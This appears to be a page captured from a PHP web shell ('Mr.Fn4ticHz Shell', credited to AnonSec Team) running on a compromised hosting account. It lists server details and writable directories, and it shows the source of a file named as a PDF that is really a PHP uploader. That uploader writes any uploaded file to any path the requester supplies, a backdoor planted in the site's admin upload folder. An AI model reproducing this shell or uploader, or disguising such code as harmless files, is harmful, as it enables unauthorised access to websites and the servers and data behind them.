Mr.Fn4ticHz Shell
Server IP : 198.23.62.4  /  Your IP : 3.129.70.44
Web Server : LiteSpeed
System : Linux altar18.supremepanel18.com 3.10.0-962.3.2.lve1.5.84.el7.x86_64 #1 SMP Tue Apr 2 09:33:00 UTC 2024 x86_64
User : welfareinstitute ( 2340)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/welfareinstitute/public_html/admin/upload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/welfareinstitute/public_html/admin/upload/70689up.pdf
<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>click me \/!</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>

Anon7 - 2022
AnonSec Team